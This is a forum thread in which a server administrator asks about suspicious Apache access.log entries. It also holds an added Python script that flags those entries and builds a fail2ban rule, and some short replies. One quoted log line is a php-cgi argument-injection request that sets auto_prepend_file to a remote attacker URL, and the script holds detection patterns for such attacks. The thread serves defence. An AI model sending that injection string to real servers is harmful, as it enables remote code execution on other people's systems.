Suspicious Traffic
I've discovered some suspicious traffic that I'd like to ask about:
A. 91.205.189.15 - - [17/Dec/2012:10:39:52 -0500] "GET /user/soapCaller.bs HTTP/1.1" 301 504 "-" "Morfeus Fucking Scanner"
B. 213.26.162.68 - - [17/Dec/2012:03:59:55 -0500] "GET /index.php?-dsafe_mode=Off+-ddisable_functions=NULL+-dallow_url_fopen=On+-dallow_url_include=On+-dauto_prepend_file=http://qualityhost.in/a.txt
C. 65.111.177.188 - - [18/Dec/2012:02:15:15 -0500] "GET / HTTP/1.1" 301 471 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11"
1. My main concern is why B turned up in access.log rather than error.log. Does that mean it was successful?
Based on what I read across the forum, this is an injection attack or checking for an open proxy, correct?
2. How can I check if something like this was successful?
3. With Fail2Ban installed, is there a way to craft a RegExp to block such future requests?
4. URL C: it doesn't look like it got anything. Is this a normal request or something to protect against?
Thanks for any advice you may have.
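As an added example (not part of this thread or any of its replies), the Python script below parses the three lines quoted above, flags the scanner user-agent in A, the php-cgi `-d` option injection and the remote `auto_prepend_file` in B, and an absolute-URI open-proxy probe on a fourth, constructed line D, then reports what the status and size columns say about whether each request got anywhere. It also shows a fail2ban-style `failregex` tested the way fail2ban expands `<HOST>`. The log regex, the marker list, the `failregex`, the `HOST_PATTERN` approximation and the verdict wording are my own assumptions, not fail2ban's shipped filters or anything from the original post.

```python
"""Triage helpers for the access.log entries quoted in the post (added example)."""
import re
from urllib.parse import unquote_plus

# Apache "combined" log format. Everything after the request target is optional so that a
# truncated line such as entry B (cut off before the status code) still parses.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)'
    r'(?: (?P<proto>HTTP/[\d.]+))?"?'
    r'(?: (?P<status>\d{3}) (?P<size>\d+|-)'
    r'(?: "(?P<referer>[^"]*)" "(?P<ua>[^"]*)")?)?'
)

# Assumed marker list: the user-agent string from entry A; extend with other scanner names.
SCANNER_UA_MARKERS = ("Morfeus",)
# php-cgi command-line switches smuggled through the query string (-d ini override,
# -s source display, -n no ini, -c ini path), as seen in entry B.
PHP_CGI_ARG_RE = re.compile(r'(?:^|[+\s])-(?:d\w+=|[snc]\b)')
# An auto_prepend_file that points at a URL is a remote file include attempt.
REMOTE_INCLUDE_RE = re.compile(r'auto_prepend_file=(?:https?|ftp)://', re.I)
# A request whose target is an absolute URI is the classic open-proxy probe.
ABSOLUTE_URI_RE = re.compile(r'^[a-z][a-z0-9+.\-]*://', re.I)

def parse_line(line):
    """Return a dict of fields, or None if the line is not an access.log entry."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    entry = m.groupdict()
    if entry["status"] is not None:
        entry["status"] = int(entry["status"])
    return entry

def classify(entry):
    """List the suspicious traits of one parsed entry (empty list means nothing flagged)."""
    target = unquote_plus(entry["target"])
    _path, _, query = target.partition("?")
    findings = []
    if any(marker in (entry.get("ua") or "") for marker in SCANNER_UA_MARKERS):
        findings.append("scanner user-agent")
    if PHP_CGI_ARG_RE.search(query):
        findings.append("php-cgi argument injection")
    if REMOTE_INCLUDE_RE.search(query):
        findings.append("remote file include via auto_prepend_file")
    if ABSOLUTE_URI_RE.match(target):
        findings.append("open-proxy probe (absolute URI request)")
    return findings

def assess(entry, findings):
    """Say what the status/size columns tell us about whether a flagged request got anywhere."""
    if not findings:
        return "benign"
    status = entry["status"]
    if status is None:
        return "unknown: entry is truncated; find the full line (status and bytes) in access.log"
    if 200 <= status < 300 and entry["size"] not in (None, "-", "0"):
        return f"needs investigation: server answered {status} with a body"
    return f"answered HTTP {status}; nothing served beyond the redirect/error response"

# fail2ban-style failregex (constructed, not a shipped filter). fail2ban substitutes <HOST>
# with a capture group for the client address; HOST_PATTERN approximates that expansion.
FAILREGEX = r'^<HOST> -.*"(?:GET|POST|HEAD) [^"]*\?-[dsnc]'
HOST_PATTERN = r'(?:::f{4,6}:)?(?P<host>\S+)'

def failregex_host(line, failregex=FAILREGEX):
    """Return the address fail2ban would ban for this line, or None if the regex does not fire."""
    m = re.search(failregex.replace("<HOST>", HOST_PATTERN), line)
    return m.group("host") if m else None

# Entries A-C quoted from the post, plus one constructed open-proxy probe (D).
SAMPLE_LINES = {
    "A": '91.205.189.15 - - [17/Dec/2012:10:39:52 -0500] "GET /user/soapCaller.bs HTTP/1.1" 301 504 "-" "Morfeus Fucking Scanner"',
    "B": '213.26.162.68 - - [17/Dec/2012:03:59:55 -0500] "GET /index.php?-dsafe_mode=Off+-ddisable_functions=NULL+-dallow_url_fopen=On+-dallow_url_include=On+-dauto_prepend_file=http://qualityhost.in/a.txt',
    "C": '65.111.177.188 - - [18/Dec/2012:02:15:15 -0500] "GET / HTTP/1.1" 301 471 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11"',
    "D": '192.0.2.10 - - [18/Dec/2012:04:00:00 -0500] "GET http://example.com/ HTTP/1.1" 404 210 "-" "Mozilla/4.0"',
}

def triage(lines=SAMPLE_LINES):
    """Map label -> (ip, findings, verdict, fail2ban host) for each line."""
    report = {}
    for label, line in lines.items():
        entry = parse_line(line)
        findings = classify(entry)
        report[label] = (entry["ip"], findings, assess(entry, findings), failregex_host(line))
    return report

if __name__ == "__main__":
    for label, (ip, findings, verdict, banned) in triage().items():
        traits = ", ".join(findings) or "-"
        print(f"{label} {ip:15} {traits:55} {verdict}  ban={banned}")
```

Two design points worth noting. access.log records every request the server handled, whatever the outcome, while error.log only records server-side errors, so a hostile request appearing in access.log says nothing about success; the status and size columns are what to look at, and entry B as quoted is cut off before them, which is why `assess` refuses to give a verdict for it. The `failregex` fires only on B, not on A or C, so a jail built on it would ban the php-cgi probe without touching the ordinary Chrome request.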
4 Replies
For C, that looks like a completely normal web request. Somebody using Chrome tried to access your website. Why would you want to block it?
Yes, I do have index.php.
Well, I probably should have stated that I'm new to managing this aspect of a server, so I just wanted to check. You've definitely put me at ease though. In regards to C, I had figured that legitimate requests would have had more than '/' - something along the lines of B.
A and B are definitely malicious traffic, but if you keep up to date with security updates, you should be fine.